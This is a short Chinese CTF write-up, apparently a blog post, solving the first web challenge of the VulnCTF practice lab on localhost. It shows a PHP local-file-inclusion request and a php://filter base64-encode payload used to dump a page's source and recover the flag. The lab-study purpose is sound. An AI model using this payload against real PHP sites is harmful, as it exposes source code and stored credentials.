VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/nzjdsds/article/details/82936069

项目地址:https://github.com/jianmou/VulnCTF

============================

个人收获:

1.利用PHP内置协议直接读取网页代码

==============================

题目:

我们查看下网页源码

通过代码发现是文件包含。

我们把url改为http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php并加上?page=

然后我们试着访问

http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php?page=Y29uZmln.php

出来的是phpinfo的页面,搜索关键词flag和查看网页源码也没有什么发现

那么我们利用伪协议读取下网页的源码看看有什么线索

http://localhost/vulnctf/web/challenges/abf20c91a442da48/index.php?page=php://filter/read=convert.base64-encode/resource=Y29uZmln.php

得到如下结果

去网上进行base64解密

得到flag

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/82936069
今日推荐